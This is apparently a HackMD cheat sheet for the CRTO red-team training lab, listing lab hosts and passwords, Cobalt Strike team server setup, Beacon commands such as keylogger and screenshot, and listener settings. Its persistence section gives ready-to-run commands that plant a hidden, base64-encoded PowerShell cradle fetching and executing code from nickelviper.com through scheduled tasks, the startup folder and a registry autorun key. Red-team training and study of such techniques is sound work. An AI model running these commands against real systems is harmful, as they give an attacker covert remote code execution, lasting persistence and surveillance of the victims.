Try   HackMD

CRTO Cheat Sheet

Lab info

red_team_ops_lab

Hosts

IP Name Hostname
10.10.255.244, 10.10.254.244 AdminBox
10.10.5.40 Attacker Desktop DESKTOP- 3BSK7NO
10.10.5.50 Attacker Linux ubuntu
10.10.122.10 Domain Controller 2 dc-2.dev.cyberbotic.io
10.10.120.100 Elastic Stack elk.cyberbotic.io
10.10.120.20 Exchange Server mail.cyberbotic.io
10.10.122.15 File Share fs.dev.cyberbotic.io
10.10.151.10 MSP DC ad.msp.org
10.10.5.250 PowerDNS powerdns
10.10.120.30 SCM Server 1 scm-1.cyberbotic.io
10.10.120.25 SQL Server 1 sql-1.cyberbotic.io
10.10.122.25 SQL Server 2 sql-2.cyberbotic.io
10.10.122.254 Squid Proxy squid.dev.cyberbotic.io
10.10.150.10 Studio DC dc.dev.studio.com
10.10.122.30 Web Server web.dev.cyberbotic.io
10.10.123.101 Workstation 1 wkstn-1.dev.cyberbotic.io
10.10.123.102 Workstation 2 wkstn-2.dev.cyberbotic.io

Credentials

Username Password Hostname Domain Comments
bfarmer Sup3rman dev.cyberbotic.io
jking Qwerty123 dev.cyberbotic.io
nlamb F3rrari dev.cyberbotic.io
nglover BenNev!s cyberbotic.io

Cobalt Strike

Team Server

From terminal

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX

As a Service

sudo nano /etc/systemd/system/teamserver.service

[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target

sudo systemctl daemon-reload
sudo systemctl status teamserver.service

sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service

sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service

Beacon

# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jib>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Get metadata/info Beacon

Listeners

name payload host port bindto beacons profile
dns windows/beacon_dns/reverse_dns_txt pics.nickelviper.com 53 pics.nickelviper.com default
http windows/beacon_http/reverse_http nickelviper.com 80 nickelviper.com default
smb windows/beacon_bind_pipe TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos)
tcp windows/beacon_bind_tcp 4444 0.0.0.0
tcp-local windows/beacon_bind_tcp 4444 127.0.0.1

Recon

Host

execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Persistence

b64 Payload

Powershell Generate b64

$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Linux Generate b64

set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0

Task Scheduler

b64 Payload

Powershell Generate b64

$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

Linux Generate b64

set str 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0

Beacon

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly
  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is to add the task (you can also remove, check and list).
  • -o is the task frequency.

Startup Folder

Beacon

execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -f "UserEnvSetup" -m add

Registry AutoRun

Beacon

cd C:\ProgramData
upload C:\Payloads\http_x64.exe
mv http_x64.exe updater.exe
execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add

MS SQL Server

powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
Last changed by 
Javier Olmedo
0
845

Read more

GOAD Writeup

goad_lab_001

Jun 19, 2025
redteam_cheatsheet

Simple port

Jun 4, 2024
Read more from Javier Olmedo
Published on HackMD